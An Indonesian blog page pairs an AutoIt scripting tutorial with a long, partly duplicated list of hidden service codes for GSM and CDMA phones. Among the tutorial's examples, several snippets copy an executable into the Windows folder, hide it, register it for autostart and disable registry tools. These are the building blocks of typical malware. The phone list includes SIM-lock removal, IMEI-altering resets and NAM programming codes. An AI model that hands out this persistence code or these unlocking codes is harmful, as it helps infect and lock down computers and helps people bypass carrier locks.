AutoIt merupakan software yang digunakan untuk membuat suatu program.
AutoIt dapat dikategorikan sebagai bahasa pemrograman karena memiliki
ciri seperti terdapat adanya "if condition". Coding di AutoIt cukup mudah
dan cocok terutama bagi mereka yang baru mempelajari coding di Batch
atau VBS.
Untuk mendownloadnya secara gratis di http://www.autoitscript.com .
Untuk memulai : masuk ke Start Menu - AutoIt v3 - SciTE Script Editor.
Setelah muncul editor tempat kita scripting, pastikan disave terlebih
dahulu dengan format .au3 . Untuk menjalankan program yang telah kita
buat dengan menekan tombol F5. Untuk mebuatnya menjadi exe dengan menekan
tombol F7.
Ok, langsung saja, disini saya akan memberi contoh kode2 yang sering
digunakan saja
- Menulis komentar :
; This is comment
- Menampilkan kotak pesan berisi Hello World dengan judul Tutorial :
MsgBox(0, "Tutorial", "Hello World!")
- Memanggil variabel :
$language = "Hello World!"
MsgBox(0, "Tutorial", $language)
- Situasi kondisi :
$country = "Indonesia"
If $country = "Indonesia" Then
MsgBox(0, "Tutorial", "Yes!")
Else
MsgBox(0, "Tutorial", "No!")
EndIf
- Pengulangan :
For $count = 1 To 5
MsgBox(0, "Tutorial", "Count is: " & $count)
Next
- Pengulangan 2 :
$count = 1
Do
MsgBox(0, "AutoIt Example", "Count is: " & $count)
$count = $count + 1
Until $count > 5
- Pengulangan 3 :
$count = 0
While $count < 5
$count = $count + 1
MsgBox(0, "AutoIt Example", "Count is: " & $count)
Wend
- Input box :
$answer = MsgBox(4, "Tutorial", "Do you like me ?")
If $answer = 7 Then ;If 7 = "No" was clicked
MsgBox(0, "AutoIt", "OK. Bye!")
Else
MsgBox(0, "AutoIt", "OK. Continue!")
EndIf
- Memanggil program :
Run("notepad.exe")
- Menutup program berdasarkan caption :
WinClose("Untitled - Notepad")
- Menutup program berdasarkan nama proses :
ProcessClose ("notepad.exe")
- Mengkopi file :
FileCopy ("C:\zero.exe", "C:\WINDOWS\zero.exe",9)
- Merubah atribut file :
FileSetAttrib ("C:\WINDOWS\zero.exe", "+R+A+S+H")
- Menulis registry :
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","zero", "REG_SZ", "C:\WINDOWS\zero.exe")
- Menulis registry 2 :
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools", "REG_DWORD", "1")
- Membuat file :
FileWriteLine ("c:\baca.txt", "Hello")
FileWriteLine ("c:\baca.txt", "This is tutorial")
- Sleep
sleep (400)
- Memanggil fungsi :
Func TestFunc1()
MsgBox(0, "Tutorial", "Hello World!")
EndFunc
TestFunc1() ;calling
- Membuat traytip :
TrayTip("Tutorial", "Hello World!", 5, 1)
sleep(2000)
- Mengganti teks di file :
$TextFileName = "TextFile.txt"
$FindText = "replaceMe"
$ReplaceText = "newText"
$FileContents = FileRead($TextFileName)
$FileContents = StringReplace($FileContents,$FindText,$ReplaceText)
FileDelete($TextFileName)
FileWrite($TextFileName,$FileContents)
- Menampilkan informasi drive :
$DriveArray = DriveGetDrive("all")
If Not @error Then
$DriveInfo = ""
For $DriveCount = 1 to $DriveArray[0]
$DriveInfo &= StringUpper($DriveArray[$DriveCount])
$DriveInfo &= " - File System = " &
DriveGetFileSystem($DriveArray[$DriveCount])
$DriveInfo &= ", Label = " & DriveGetLabel($DriveArray[$DriveCount])
$DriveInfo &= ", Serial = " &
DriveGetSerial($DriveArray[$DriveCount])
$DriveInfo &= ", Type = " & DriveGetType($DriveArray[$DriveCount])
$DriveInfo &= ", Free Space = " &
DriveSpaceFree($DriveArray[$DriveCount])
$DriveInfo &= ", Total Space = " &
DriveSpaceTotal($DriveArray[$DriveCount])
$DriveInfo &= ", Status = " & DriveStatus($DriveArray[$DriveCount])
$DriveInfo &= @CRLF
Next
MsgBox(4096,"Drive Info", $DriveInfo)
EndIf
- Menentukan proses sedang berjalan atau tidak :
$ProcessName = "Notepad.exe"
If ProcessExists($ProcessName) Then
MsgBox(0,"Running",$ProcessName & " is running.")
Else
MsgBox(0,"Not Running",$ProcessName & " is not running.")
EndIf
- Membuat angka acak :
$LowerLimit = 29
$UpperLimit = 444
$RandomNumber = Random($LowerLimit,$UpperLimit,1)
MsgBox(0,"Random Number",$RandomNumber)
- Mendownloaad file :
$FileURL = "http://www.anggiawan.web.id/index.htm"
$FileName = "index.htm"
$FileSaveLocation = FileSaveDialog("Location to save
?",@ScriptDir,"All (*.*)",18,$FileName)
$FileSize = InetGetSize($FileURL)
InetGet($FileURL,$FileName,0,1)
ProgressOn("","")
While @InetGetActive
$Percentage = @InetGetBytesRead * 100 / $FileSize
ProgressSet($Percentage,"Downloaded " & @InetGetBytesRead & " of " &
$FileSize & " bytes","Downloading " & $FileName)
Sleep(250)
Wend
ProgressOff()
MsgBox(0, "Done","Download Complete!")
Okeh huff.. segitu aja sedikit tutorial coding menggunakan AutoIt,
silahkan dicoba terutama bagi yang masih terperangkap di zone bat / vbs
dan jangan lupa untuk membaca Help nya AutoIt.
Tambahin lagi dong Bro...
sumber:http://www.jasakom.com/
Senin, 09 Maret 2009
Selasa, 17 Februari 2009
Code Rahasia Handphone GSM dan CDMA
Code Rahasia Handphone GSM dan CDMA Print
Macam-macam code rahasia handphone adalah code-code yang biasa dipergunakan untuk mereparasi perangkat handphone atau dalam perbaikan ponsel hanya dengan menekan tombol keypad yang ada pada handphone yang telah mengalami kerusakan, kerusakan-kerusakan ini bisa tergolong ringan maupun berat, dalam teknik perbaikan ini tidak memerlukan perangkat lain atau alat bantu yang biasa digunakan untuk mereparasi pada handphone yang rusak, sedang kerusakan-kerusakan ini seperti : Hang, System Error, Aplikasi Error, Phone Lock, Searching, Dll
ERICSSON
*#06# IMEI number
*#0000# or < 0 0 0 0 > Restore English menu version
> * < < * < * Version of software
< * * < Simlock info
SAMSUNG
IMEI number: * # 0 6 #
Software version: * # 9 9 9 9 # or * # 0 8 3 7 #
Net Monitor: * # 0 3 2 4 #
Memory reset (removes SIMLOCK!!!): *2767*3855# (works only on older versions)
Memory reset CUSTOM: *2767*2878# (works only on older versions)
Change dispplay contrast: * # 0 5 2 3 #
Memory info: * # 0 3 7 7 # or * # 0 2 4 6 #
Battery status: * # 9 9 9 8 * 2 2 8 #
Change sound of alarm: *#9998*289#
Vibra test: *#9998*842#
SIEMENS
S6, S8:
If you add to phonebook under 'own phone number' +12022243121 with namez (for example MMI), then you will see something :)
S10, E10:
In phonebook enter +12022243121 as your own phone no. You will see a picture with sun, two palms and greetings.
S15e:
Monitor Mode:
Code: *#7436267*8378# (*#SIEMENS*TEST#)
Hold red phone button until it code disapears.
Menu 3.3.4 Choose frequency.
Menu 3.3.4.1 Automaticaly.
Menu 3.3.4.2 Choose GSM-900
Menu 3.3.4.3 Choose GSM-1800
S25:
Enhanced Full Rate
*#3370# turns on
#3370# turns off
Haft Rate Mode
*#4720# turns on
#4720# turns off.
Languages:
*#0000#+green phone - choose automaticaly
*#0001#+green phone - English
*#0030#+green phone - Greek
*#0031#+green phone - Netherlands
*#0032#+green phone - French
*#0034#+green phone - Spanish
*#0039#+green phone - Italian
*#0049#+green phone - German
*#0090#+green phone - Turkish
How to change PIN2?
**04*old PIN2*new PIN2*new PIN2#
What is my software version?
Menu 8-8-2 press left-softkey when you see IMEI number, or *#06# and then green phone button and then press left soft-key.
How to extend battery life:
IrDA - turn on only when you need.
Turn off automatic network search (6-3)Turn off Vibration alarm.
C25:
Languages:
*#0000#+green phone - choose automaticaly
*#0001#+green phone - English
*#0030#+green phone - Greek
*#0031#+green phone - Netherlands
*#0032#+green phone - French
*#0034#+green phone - Spanish
*#0039#+green phone - Italian
*#0049#+green phone - German
*#0090#+green phone - Turkish
How to change PIN:
**04*old PIN*new PIN*new PIN#
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
How to check simlock status
*#0606# and then press left soft-key, you will see strange characters, then text ("brak blokad"). If you see for example 260-02, it means the phone is locked to Era GSM. In older models you can use *#06# and see the same information after clickin on left key (you will see IMEI and software version).
Alcatel
Numer IMEI: * # 0 6 #
Wersja oprogramowania: * # 0 6 #
Net Monitor: 0 0 0 0 0 0 *
Alcatel One Touch Easy Secrets
Codes :
Press *#06# to view IMEI number
Press *#000000# to enter Service Menu
To view Secret Menu type 000000 then press *
Bosch
Numer IMEI: * # 0 6 #
Ustawienia poczatkowe: * # 0 0 0 0 #
Net Monitor: * # 3 2 6 2 2 5 5 * 8 3 7 8 #
Reset telefonu: # 3 3 7 0#
Bosch 738 and Bosch 718, Bosch COM 607 and 908 Secrets
Codes:
*#06# to display the IMEI
*#0000# to set the language automaticaly (To english)
*#3370# to set the Enhaced Full Rate
#3370# to Reset the phone
*#9000# to enter sim lock code
*#9003# to enter the network code
*#9004# to enter the subset code
*#9100# to remove the sim lock permanently
*#9101# to remove the corporate lock permanently
*#9102# to remove the provider lock permanently
*#9103# to remove the network lock permanently
*#9104# to remove the subset lock permanently
Reveal Engineering Menu
Press *#3262255*8378# (equivalent to *#DANCALL*TEST#) to make secret Engineering
Dancall
Numer IMEI: * # 0 6 #
Wersja oprogramowania: * # 9 9 9 9 #
Ericsson 6xx/7xx/8xx
Numer IMEI: * # 0 6 #
Wersja oprogramowania: > * < < * < *
NOKIA 3110
Numer IMEI: * # 0 6 #
Wersja oprogramowania: * # 0 0 0 0 # lub *#9999#
Przywraca ustawienia fabryczne: *#7780#
Info o simlocku (specjalne menu) : * # 9 2 7 0 2 6 8 9 # (*#war0anty# )
lub *#3110#
Zatrzymanie zegara karty SIM *#746025625#
Philips
Numer IMEI: * # 0 6 #
Info o simlock`u: * # 8 3 7 7 #
Security code: * # 1 2 3 4 # (Fizz) albo * # 7 4 8 9 #
Philips DIGA phones:
Blocking list *#3333*#
Time connected *#2558*#
Flags,something *#3377*#
Security code *#7489*#
Philips FIZZ phones:
IMEI code *#06#
SW info *#8377*#
Security code *#1234*#
Philips SPARK phones:
IMEI: *#06#
Philips GENIE phones:
*#06# IMEI number
*#2254*# Status register: C, BS, RR, MMI, CREAT.
*#2255*# activate and deactivate the "DEBUG CALL"-Mode; when activated, make a
call to a busy line an the phone will display some
hex-codes on the display
*#2558*# the time in days,hours and minutes you are connected to the net
*#2562*# not clear; the phone reconnects to the net
*#2565*# not clear; warmstart
*#3333*# (NO) BLOCKING - list (15 items)
*#2377*# "BEER": not clear, the phone waits a random time and reconnects to the
net
*#3377*# Init, Flags, SIM LCK
*#3353*# resets the (NO) BLOCKING - list
*#7378*# Name, Length, SIM phase
*#7489*# SECURITY CODE
*#7693*# activate and deactivate the SLEEP MODE (when deactivated the battery
will go down!)
*#7787*# SPURIOUS INTERRUPT
*#7948*# SWITCH OFF
*#8463*# Some information about the SLEEP MODE: Wake, Sleep Req., Sleep
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
SAMSUNG SGH-600 SECRET CODES
============================
*#06# -> Show IMEI
*#9999# -> Show Software Version
*#0001# -> Show Serial Parameters
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!!!! but also
change IMEI to 447967-89-400044-0, you must use CHGIMEI to
restore it)
*2767*2878# -> Custom EEEPROM Reset
*#9998*228# -> Battery status (capacity, voltage, temperature)
*#9998*246# -> Program status
*#9998*289# -> Change Alarm Buzzer Frequency
*#9998*324# -> Debug screens
*#9998*364# -> Watchdog
*#9998*377# -> EEPROM Error Stack
*#9998*427# -> Trace Watchdog
*#9998*523# -> Change LCD contrast
*#9998*544# -> Jig detect
*#9998*636# -> Memory status
*#9998*746# -> SIM File Size
*#9998*778# -> SIM Service Table
*#9998*785# -> RTK (Run Time Kernel) errors
*#9998*786# -> Run, Last UP, Last DOWN
*#9998*837# -> Software Version
*#9998*842# -> Test Vibrator
*#9998*862# -> Vocoder Reg
*#9998*872# -> Diag
*#9998*947# -> Reset On Fatal Error
*#9998*999# -> Last/Chk
*#9998*9266# -> Yann debug screen (=Debug Screens?)
*#9998*9999# -> Software version
*0001*s*f*t# -> Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete)
*0002*?# -> unknown
*0003*?# -> unknown
All CDMA codes...................
Here i post many codes for cdma phones ..............................
Samsung sph-n240, n400, a460, a500, etc Nam Programming:
Nam Set: ##Spc
Test Mode: 47*869#1235
Debug Menu: ##33284,ok
Service Menu: Menu+8+0 (#889)
Reset (Life time, Clear Memory, etc): ##786,ok
A-key: ##2539,ok
Label Selection: ##3882,ok
Label(Home, Work, etc) : **523,ok
NGG Setting (Gateway, etc.): ##2769737,ok
Vocoder: ##8626337,ok
CAI Change: ##7738,ok
Enable TTY: ##889,ok
Samsung sch-411, 611, n105, a100, a300, a2000, etc Nam Programming:
Nam Set: 47*869#08#9
Nam Set: Menu+60
Test Mode: *759#813580
Test Mode: 5809540*45680
A-key: Menu+0, 25##
External Audio: Menu+0, ####
Debug Menu: Menu+8, 0415 or Spc
Debug Menu: Menu+9, 0415 or Spc
Brief NAM Programing: Menu+40,626 (not all version)
LCD Contrast: Menu+45 (not all version)
SIO Mode: Menu+49
SIO Mode: Menu+69
Samsung a300, a530, a610, a620, a660, a670, etc Nam Programming:
Nam Set: Menu, 6, *
Service Menu: Menu, 9, *
Test Mode: 47*68#13580
Samsung X, E, V, S-series (korean), e250, v420, s250, etc Nam Programming:
Nam Set: 6548#0**4#6
Nam Set: 47*869#08#9
Nam Set: 74153697193
Test Mode: 5809540*45680 (88 - efs clear)
Debug Menu: Menu(hold 2sec)+0, 6725 or 9720 or 1973 or 0415
Debug Menu: Menu+0(hold 2sec), 6725 or 9720 or 1973 or 0415
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
Samsung N356 (India version) Nam Programming:
Test Mode: Menu, 5, down arrow, *
Test Mode: **00## (in some flashes)
Samsung i700, etc Nam Programming:
Nam Set: Go to start and select "PHONE" from the drop down menu, dial #83587
Samsung i300, etc Nam Programming:
1. Tap on the Phone Icon with stylus
2. Press #907*9#0 ENTER LOCK should appear on screen
3. Enter OTKSL
4. SVC MENU will appear press 1
5. Enter 10 digit MIN and then press SAVE
6. Press SAVE again
7. Press 3 and then press SAVE 6 times
8. Enter the HOME SID and press SAVE once
9. Press END key twice
TEST MODE COMMANDS:
n105_test_mode.txt
a500_test_mode.txt
a530_test_mode.txt
<>
Qualcomm qcp-800 Nam Pogramming:
Nam Set: Menu+3+0+Spc
Field Test: Menu+7+0+Fsc
Kyocera 1135, 2255, 3035, 5135, 6035, Se47, etc Nam Programming:
Nam Set: 111111+Jog Dial(Ok), Select "Programming"+Spc
CAI Change: ##7738,ok
Enable TTY: ##889,ok
Life Timer, PRL, etc: ##786,ok
A-key: ##2539,ok
A-key: 2539,ok
Tips:
On some kyocera handsets the factory service module has not been disabled
and the phone can be programmed without the spc by inputting.
Nam Set: ##333333 menu (service)
SANYO>>
Sanyo 4900, 5150, 5300, 8100, etc Nam Programming:
Nam Set: ##Spc+Ok+Key Down+Ok
Advanced Setup: ##3282+Ok+Key Down+Ok+Msl
A-key: ##2539+Ok+Key Down+Ok
Version: ##**837+Ok+Key Down+Ok
Debug Menu: ##FSC+Ok+Key Down+Ok
Airtime menu: ##8463+Ok+Key Down+Ok
Change CAI: ##7738+Ok+Key Down+Ok
Vocoder: ##8626337+Ok+Key Down+Ok
Reverse Logistic: ##786+Ok+Key Down+Ok
Set IP Address: ##2769737+Ok+Key Down+Ok
TTY On/Off: ##889+Ok+Key Down+Ok
Ready Link: ##4636+Ok+Key Down+Ok
Browser Init On/Off: ##4682+Ok+Key Down+Ok
Picture Token: ##25327+Ok+Key Down+Ok
Unknown Code: ##5282277+Ok+Key Down+Ok
(SPC=000000, FSC=040793)
Sanyo scp-A011, smp-A017, etc Nam Programming:
Nam Set: F9(3 beep) + 0*72696#767
<>
Nokia 3280, 3285, 3580, 3585, 5185, 6185, 8280, etc Nam Programming:
Nam Set: *3001#12345#
Software Version: *#837#
Software Version: *#9999#
Esn Number: *#92772689#
Restart Phone: *#75681#
Restart Phone: *#75682#
Nokia 8887 Nam Programming:
Nam Set: *3001#12345#
Version: *#0000#
Evrc: *#8378#
Esn/Data/Timer: *#92772689#
SID: *#743#
Nokia 8587 Nam Programming:
Nam Set: *#626#7764726#
A-Key: #8159357022#4579# (26 digits)
A-Key: #8159357022#4547# (20 digits)
Version: *#0000#
Version: *#837#
Vocoder: *#3872#
Change language: Menu 5, 3, 1
Change DM mode: *#7678#
Debug Screen: *#8378#
Debug: *#8380#
Field Test Menu: *#83788#
SPC Unlock, Factory Reset:
Full Factory Reset: *#7370#
Resets all settings including non-user changeable items (like SPC)
NOKIA TEST MODE:
51xx, 61xx, 71xx, 3285, 63xx, etc:
1) Turn on the phone. Press *3001#12345#
2) Scroll up to where it says "Field Test" and choose SELECT
3) Highlight "Enable" and choose OK. Turn the phone off then back on.
4) If the test mode screen does not show up press MENU and scroll
down to "Field Test" choose SELECT. Press 0 1 then choose OK.
5) Lower left or upper left number is the signal strength.
6) To turn off the test mode press MENU and scroll down to where it says
"Field Test" choose SELECT. Press 0 0 and then choose OK.
3360, 6360:
1) Turn on the phone. Press *3001#12345#
2) Scroll up to where it says "Field Test" and choose SELECT
3) Highlight "Enable" and choose OK. Turn the phone off then back on.
4) If the test mode screen does not show up press MENU and scroll
down to "Field Test" choose SELECT. Press 2 1 0 1 then choose OK.
5) Lower left or upper left number is the signal strength.
6) To turn off the test mode press MENU and scroll down to where it says
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
"Field Test" choose SELECT. Press 2 1 0 0 and then choose OK.
<>
Audiovox 4000, 9000, 9100, 9155, 9500, etc Nam Programming:
(Power the phone on and wait until the little light on top goes out)
Nam Set: 289+fcn+#+1
Service menu: fcn+00+fsc(000000)
Test Mode: Hold (2,*,Rcl)+Power
Test Mode Commands:
99 - download - flash phone
124 - inam data write
125 - version
126 - esn read
127 - sec_code
128 - lock_code
129 - is WFTV data write
137 - FSC code
138 - NPcode (nam program code)
139 - dscode
141 - restart
218 - Read_Addr
000 - is cdma mode
001 - is fm mode
002 - is pcs mode
008 - is reg read addr
020 - is lna_range
Audiovox pcx-3500xl Nam Programming:
Nam Set: ##2726+Send+1998+1+Spc+1
Audiovox cdm-100, 130, 135, 8300, 8500, 8600, etc Nam Programming:
Nam Set: ##20022002+Pwr+1+Spc
Audiovox 8610, 8910, etc Nam programming:
Name Set: ##847446, end, 111111
Audiovox-107 Nam Programming:
Nam Set: 45680*47*869#1
Audiovox CMP-3 Nam Programming:
Nam Set: 45680*47*869#1
Dm Mode: Menu, 6, 6
Audiovox 9950 Nam Programming:
Nam Set: ##3282
Audiovox Z800 (Audiovox 7900, Sharp) Nam Programming:
Nam Set: m + # + envelope key + * + 1
Audiovox Thera (Toshiba 2032) Nam Programming:
Thera Nam Programming User Manual - nam_thera.pdf
AUDIOVOX TEST MODE:
9100, 9155:
1) Turn on the phone. As soon the phone comes on and the green light
turns off press RIGHTARROW, 0, 0. The phone will ask for the
"FSC Code", press 000000 then choose OK and press RIGHTARROW,
RIGHTARROW. Your phone is now in test mode.
2) The signal strength is the number on the top right hand side of the screen.
3) To turn off test mode shut of the phone and then turn it back on.
<>
Motorola 7760, 7860, 2260, 8160, etc Nam Programming:
Nam Set: Fcn,0000000000000, Rcl
Nam Set: 74663#, Fcn, Fcn
Test Mode: Fcn, 00**83786633, Sto
Motorola v60c, v120c etc Nam Programming:
Nam Set: 74663#, Menu, Menu, Spc
Nam Set: Menu, 073887, * (type quickly)
Test Mode: Menu, 073887*, Spc
Debug Mode: ##33284
Force the phone into DIGITAL ONLY mode:
1) ##33284 (Debug)
2) RIGHT Softkey (Next) Twice
3) Down arrow 10 times to "PrefMod"
4) RIGHT Softkey (Change) until you see "DigOnly"
5) LEFT softkey (Exit)
6) MENU then LEFT Softkey return to idle screen
7) ##33284 (The last 4 will not display if you have done it correctly)
Motorola t182, c210, etc Nam Programming:
Nam Set: ##1111 end
Nam Set: ##298645665 end
Short Nam: ##073887 sto
Motorola v710, v730, v740, ms150, etc Nam Programming:
Nam Set: 8378*# + press 3 times NATE (spc - 071082)
Test Mode: Menu, 073887*, Spc
Service Menu: #758353266#646#
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
Motorola StarTac 2004 Nam Programming:
Nam Set: 5759789*#, rec key (3)times (spc - 915037)
Motorola ms200, ms230, etc Nam Programming:
Nam Set: 5759789*# (spc - 915037)
Motorola v6060 Nam Programming:
Nam Set:147*369#456*0#
MOTOROLA TEST MODE:
v60, c120, c331, etc:
1) Turn on the phone. Press MENU 0 7 3 8 8 7 *
2) The phone will require you to "Enter a Security Code", press 000000, OK
3) Scroll down to "Test mode" choose SELECT. Scroll down to "Enable"
choose SELECT. Your phone is now in test mode.
4) Signal strength is the 3_rd number down on the left hand side of the screen.
5) To toggle between regular mode and test mode: Press MODE then
quickly press the BUTTON DIRECTLY TO THE LEFT OF MENU.
6) To turn off the test mode the phone must be in regular mode, then follow
the above sequence and scroll down to where it says "DISABLE" instead of
"ENABLE" and choose select.
Motorola Bible - bible.txt
<>
lgc-300, etc Nam Programming:
Nam Set: Menu, 9, Spc
A-key: Press "Sto" 3sec, 2539**
lgc-330w, etc Nam Programming:
Nam Set: Menu, 4, 0, Spc
A-key: 2539**
sumber
Macam-macam code rahasia handphone adalah code-code yang biasa dipergunakan untuk mereparasi perangkat handphone atau dalam perbaikan ponsel hanya dengan menekan tombol keypad yang ada pada handphone yang telah mengalami kerusakan, kerusakan-kerusakan ini bisa tergolong ringan maupun berat, dalam teknik perbaikan ini tidak memerlukan perangkat lain atau alat bantu yang biasa digunakan untuk mereparasi pada handphone yang rusak, sedang kerusakan-kerusakan ini seperti : Hang, System Error, Aplikasi Error, Phone Lock, Searching, Dll
ERICSSON
*#06# IMEI number
*#0000# or < 0 0 0 0 > Restore English menu version
> * < < * < * Version of software
< * * < Simlock info
SAMSUNG
IMEI number: * # 0 6 #
Software version: * # 9 9 9 9 # or * # 0 8 3 7 #
Net Monitor: * # 0 3 2 4 #
Memory reset (removes SIMLOCK!!!): *2767*3855# (works only on older versions)
Memory reset CUSTOM: *2767*2878# (works only on older versions)
Change dispplay contrast: * # 0 5 2 3 #
Memory info: * # 0 3 7 7 # or * # 0 2 4 6 #
Battery status: * # 9 9 9 8 * 2 2 8 #
Change sound of alarm: *#9998*289#
Vibra test: *#9998*842#
SIEMENS
S6, S8:
If you add to phonebook under 'own phone number' +12022243121 with namez (for example MMI), then you will see something :)
S10, E10:
In phonebook enter +12022243121 as your own phone no. You will see a picture with sun, two palms and greetings.
S15e:
Monitor Mode:
Code: *#7436267*8378# (*#SIEMENS*TEST#)
Hold red phone button until it code disapears.
Menu 3.3.4 Choose frequency.
Menu 3.3.4.1 Automaticaly.
Menu 3.3.4.2 Choose GSM-900
Menu 3.3.4.3 Choose GSM-1800
S25:
Enhanced Full Rate
*#3370# turns on
#3370# turns off
Haft Rate Mode
*#4720# turns on
#4720# turns off.
Languages:
*#0000#+green phone - choose automaticaly
*#0001#+green phone - English
*#0030#+green phone - Greek
*#0031#+green phone - Netherlands
*#0032#+green phone - French
*#0034#+green phone - Spanish
*#0039#+green phone - Italian
*#0049#+green phone - German
*#0090#+green phone - Turkish
How to change PIN2?
**04*old PIN2*new PIN2*new PIN2#
What is my software version?
Menu 8-8-2 press left-softkey when you see IMEI number, or *#06# and then green phone button and then press left soft-key.
How to extend battery life:
IrDA - turn on only when you need.
Turn off automatic network search (6-3)Turn off Vibration alarm.
C25:
Languages:
*#0000#+green phone - choose automaticaly
*#0001#+green phone - English
*#0030#+green phone - Greek
*#0031#+green phone - Netherlands
*#0032#+green phone - French
*#0034#+green phone - Spanish
*#0039#+green phone - Italian
*#0049#+green phone - German
*#0090#+green phone - Turkish
How to change PIN:
**04*old PIN*new PIN*new PIN#
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
Judul Buku : Mendeteksi dan Memperbaiki Pesawat Telepon Selular Sendiri
Penerbit : Datakom Lintas Buana
How to check simlock status
*#0606# and then press left soft-key, you will see strange characters, then text ("brak blokad"). If you see for example 260-02, it means the phone is locked to Era GSM. In older models you can use *#06# and see the same information after clickin on left key (you will see IMEI and software version).
Alcatel
Numer IMEI: * # 0 6 #
Wersja oprogramowania: * # 0 6 #
Net Monitor: 0 0 0 0 0 0 *
Alcatel One Touch Easy Secrets
Codes :
Press *#06# to view IMEI number
Press *#000000# to enter Service Menu
To view Secret Menu type 000000 then press *
Bosch
Numer IMEI: * # 0 6 #
Ustawienia poczatkowe: * # 0 0 0 0 #
Net Monitor: * # 3 2 6 2 2 5 5 * 8 3 7 8 #
Reset telefonu: # 3 3 7 0#
Bosch 738 and Bosch 718, Bosch COM 607 and 908 Secrets
Codes:
*#06# to display the IMEI
*#0000# to set the language automaticaly (To english)
*#3370# to set the Enhaced Full Rate
#3370# to Reset the phone
*#9000# to enter sim lock code
*#9003# to enter the network code
*#9004# to enter the subset code
*#9100# to remove the sim lock permanently
*#9101# to remove the corporate lock permanently
*#9102# to remove the provider lock permanently
*#9103# to remove the network lock permanently
*#9104# to remove the subset lock permanently
Reveal Engineering Menu
Press *#3262255*8378# (equivalent to *#DANCALL*TEST#) to make secret Engineering
Dancall
Numer IMEI: * # 0 6 #
Wersja oprogramowania: * # 9 9 9 9 #
Ericsson 6xx/7xx/8xx
Numer IMEI: * # 0 6 #
Wersja oprogramowania: > * < < * < *
NOKIA 3110
Numer IMEI: * # 0 6 #
Wersja oprogramowania: * # 0 0 0 0 # lub *#9999#
Przywraca ustawienia fabryczne: *#7780#
Info o simlocku (specjalne menu) : * # 9 2 7 0 2 6 8 9 # (*#war0anty# )
lub *#3110#
Zatrzymanie zegara karty SIM *#746025625#
Philips
Numer IMEI: * # 0 6 #
Info o simlock`u: * # 8 3 7 7 #
Security code: * # 1 2 3 4 # (Fizz) albo * # 7 4 8 9 #
Philips DIGA phones:
Blocking list *#3333*#
Time connected *#2558*#
Flags,something *#3377*#
Security code *#7489*#
Philips FIZZ phones:
IMEI code *#06#
SW info *#8377*#
Security code *#1234*#
Philips SPARK phones:
IMEI: *#06#
Philips GENIE phones:
*#06# IMEI number
*#2254*# Status register: C, BS, RR, MMI, CREAT.
*#2255*# activate and deactivate the "DEBUG CALL"-Mode; when activated, make a
call to a busy line an the phone will display some
hex-codes on the display
*#2558*# the time in days,hours and minutes you are connected to the net
*#2562*# not clear; the phone reconnects to the net
*#2565*# not clear; warmstart
*#3333*# (NO) BLOCKING - list (15 items)
*#2377*# "BEER": not clear, the phone waits a random time and reconnects to the
net
*#3377*# Init, Flags, SIM LCK
*#3353*# resets the (NO) BLOCKING - list
*#7378*# Name, Length, SIM phase
*#7489*# SECURITY CODE
*#7693*# activate and deactivate the SLEEP MODE (when deactivated the battery
will go down!)
*#7787*# SPURIOUS INTERRUPT
*#7948*# SWITCH OFF
*#8463*# Some information about the SLEEP MODE: Wake, Sleep Req., Sleep
Raja ponsel Training Center
Pusat Service & Pelatihan Teknisi Handphone
HARDWARE DAN SOFTWARE
www.rajaponsel.com
www.wahanaponsel.com
www.majelisrasulullah.org
Jl. Bangka 2 Rt.06 Rw.02 No.18
Jakarta Selatan 12720
Kel. Pela Mampang
Telp. 021 700 36 800 / 0817 839 837
Pelatihan dibimbing oleh Penulis Buku Handphone
